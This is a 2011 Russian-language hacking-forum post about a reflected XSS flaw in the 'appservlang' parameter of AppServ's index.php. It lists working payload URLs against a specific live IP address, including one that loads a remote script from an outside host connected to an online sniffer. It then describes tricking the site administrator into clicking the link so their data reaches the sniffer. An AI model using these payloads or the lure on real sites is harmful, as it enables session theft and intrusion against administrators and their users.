Тема: Xss
Показать сообщение отдельно
Старый 04.09.2011, 17:13   #1
Salomey
Читер
Аватар для Salomey
OFFLINE
Регистрация: 31.03.2011
Сообщений: 192
Благодарностей:
9,117 всего
Мнения: + 3918
Репутация: 22975
Отправить сообщение для Salomey с помощью Skype™

Xss


работает
: AppServ 2.5.10, возможно более ранние версии, старая бага
Опасность: низкая
Источник: http://www.securitylab.ru/vulnerability/353382.php

Описание
:
Уязвимость позволяет юзеру провести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "appservlang" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

И так приступим!
адрес: http://78.108.69.118
Полный адрес: http://78.108.69.118/index.php?appservlang=
Например:

сигналы
http://78.108.69.118/index.php?appservlang="><IMG%20SRC=java script:alert
(/XSS/)>
http://78.108.69.118/index.php?appservlang="><BODY%20ONLOAD=alert(/xss/)>

Открытие нового окна:
http://78.108.69.118/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> (открывает phpinfo)
http://78.108.69.118/index.php?appservlang="><INPUT%20TYPE="xss"> (Выводит надпись)
----------------------
Берём онлайн сниффер, я взял от https://hacker-pro.net/
Далее формируем код: http://78.108.69.118/index.php?appservlang=">
[ Вставлять после "> ]
Код пассивной xss, в моём случае:
http://78.108.69.118/index.php?appservlang=">%3CSCRIPT type=text/javascript src=http://httpz.ru/vj5a0rabojgo.js></SCRIPT>"
Говорим админу что мол на этой страница бага, пожалуйста пройди по сылке, он перейдёт и на ваш сниффер придёт инфа
Счастливо повесилиться!

Последний раз редактировалось Salomey; 04.09.2011 в 17:48.

Под лежачий камень вода не течёт.
 
Ответить с цитированием